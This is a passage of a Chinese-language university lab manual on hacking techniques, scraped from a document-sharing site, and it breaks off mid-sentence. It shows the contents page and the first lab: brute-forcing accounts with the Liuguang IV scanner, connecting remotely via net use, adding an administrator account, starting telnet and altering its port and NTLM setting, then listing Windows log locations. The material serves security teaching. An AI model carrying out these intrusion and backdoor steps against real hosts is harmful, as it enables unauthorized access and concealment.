您好,欢迎访问三七文档
黑客技术实验指导书彭晓红2011年5月目录[实验一]扫描工具的使用................................................................................................................3一、实验目的...........................................................................................................................3二、实验要求...........................................................................................................................3三、实验内容和步骤...............................................................................................................3[实验二]漏洞分析与查找..............................................................................................................26一、实验目的.........................................................................................................................26二、实验要求.........................................................................................................................26三、实验内容和步骤.............................................................................................................26[实验三]缓存溢出攻击................................................................................................................28一、实验目的.........................................................................................................................28二、实验要求.........................................................................................................................28三、实验内容和步骤.............................................................................................................28[实验四]SQLinjection攻击..........................................................................................................41一、实验目的.........................................................................................................................41二、实验要求.........................................................................................................................41三、实验内容和步骤.............................................................................................................41[实验一]扫描工具的使用一、实验目的(1)通过使用流光IV软件获取目标主机的帐号和密码,并登陆。(2)通过实验了解和掌握扫描工具的使用。二、实验要求1了解和掌握扫描工具的使用。2在命令提示符下使用net相关命令。三、实验内容和步骤任务一扫描工具的使用1点击探测-高级扫描工具!2输入ip地址范围起始地址/结束地址:需要扫描的IP地址范围。目标系统:ALL-所有系统/NT-NT/2000系统/UNIX-UNIX系统,根据选择的不同下面的[检测项目]将会有不同设置。获取主机名:获取主机的名称。检测项目:选择需要扫描的项目,根据选择的不同表单会有所不同。3自己定义你的用户字典和密码字典。猜解用户名字典:设置扫描中采用的用户字典,适用于POP3/FTP/IMAP/SQL/MYSQL。猜解密码字典:设置扫描中采用的密码字典,适用于POP3/FTP/IMAP/SQL/MYSQL。保存扫描报告:扫描的报告,采用HTML格式。并发线程数目:默认80,可以根据情况增减,如果线程数目越大速度越快但是越容易误报和漏报。网络选项:设置TCP参数4实验结果任务二成功登陆到目标主机1在命令提示符下使用netuse命令远程连接主机210.192.111.207。如下所示:2输入以下命令探测目标主机信息ver对方主机显示:C:\WINNT\system32verMicrosoftWindows2000[Version5.00.2195]C:\WINNT\system32C:\WINNT\system32netstart已经启动以下Windows2000服务:AlerterApplicationManagementCOM+EventSystemComputerBrowserDHCPClientDistributedFileSystemDistributedLinkTrackingClientDistributedLinkTrackingServerDistributedTransactionCoordinatorDNSClientEventLogFileReplicationServiceFTPPublishingServiceIISAdminServiceIndexingServiceIntersiteMessagingIPSECPolicyAgentKerberosKeyDistributionCenterLogicalDiskManagerMessengerMicrosoftSearchMicrosoftSMTPServiceMSSQLServerNetLogonNetworkConnectionsNTLMSecuritySupportProviderPlugandPlayPrintSpoolerProtectedStorageRemoteProcedureCall(RPC)RemoteProcedureCall(RPC)LocatorRemoteRegistryServiceRemovableStorageRunAsServiceSecurityAccountsManagerServerSQLServerAgentSystemEventNotificationTaskSchedulerTCP/IPNetBIOSHelperServiceWindowsManagementInstrumentationDriverExtensionsWindowsTimeWorkstationWorldWideWebPublishingService许可协议登录服务命令成功完成。C:\WINNT\system32C:\WINNT\system32netstarttelnetTelnet服务正在启动.Telnet服务已经启动成功。3在目标主机上新增用户C:\WINNT\system32netuserkkkk/add命令成功完成。C:\WINNT\system32C:\WINNT\system32netlocalgroupadministratorskk/add命令成功完成。输入:telnet210.192.111.207显示:NTLMAuthenticationfailedduetoinsufficientcredentials.PleaseloginwithcleartextusernameandpasswordServerallowsNTLMauthenticationonlyServerhasclosedconnection遗失对主机的连接。4在小榕的流光IV目录下的tools目录下有一个ntlm.exe的文件5把telnet服务停止,然后重新启动.再试一试!6tlntadmntelnet服务器管理器。如果对方主机上有人运行了这个程序,你的ip地址和你所使用的用户名就被他看到了!选择3可以更改telnet断口,默认的是23。telnet210.192.111.207窗口显示:0)退出这个应用程序1)列出当前用户2)结束一个用户的会话...3)显示/更改注册表设置...4)开始服务5)停止服务请键入一个选项的号码[0-5]以选择该选项:3请在下列选项中选择一个:0)退出这个菜单1)AllowTrustedDomain2)AltKeyMapping3)DefaultDomain4)DefaultShell5]以选择该选项:5)LoginScript6)MaxFailedLogins7)NTLM8)TelnetPort请键入一个选项的号码[0-8]以选择该选项:70)退出这个菜单Domain1)AllowTrustedDomain5)LoginScript6)MaxFailedLogins7)NTLM8)TelnetPort请键入一个选项的号码[0-8]以选择该选项:8TelnetPort的当前值=23您确实想更改这个值吗?[y/n]yTelnetPort[当前值=23;]:99您确实想将TelnetPort设置为:99?[y/n]y只有当Telnet服务重新开始后设置才会生效请在下列选项中选择一个:0)退出这个菜单1)AllowTrustedDomain2)AltKeyMapping3)DefaultDomain5]以选择该选项:4)DefaultShell5)LoginScript6)MaxFailedLogins7)NTLM8)TelnetPort请键入一个选项的号码[0-8]以选择该选项:7NTLM的当前值=1您确实想更改这个值吗?[y/n]ntlm的默认值是2刚才copy的ntlm并在他的主机运行已经改过了。7Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、日志等等,可能会根据服务器所开启的服务不同。应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%\system32\config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%\system32\config\SecEvent.EVT系统日志文件:%syst
本文标题:黑客技术实验指导书
链接地址:https://www.777doc.com/doc-3884985 .html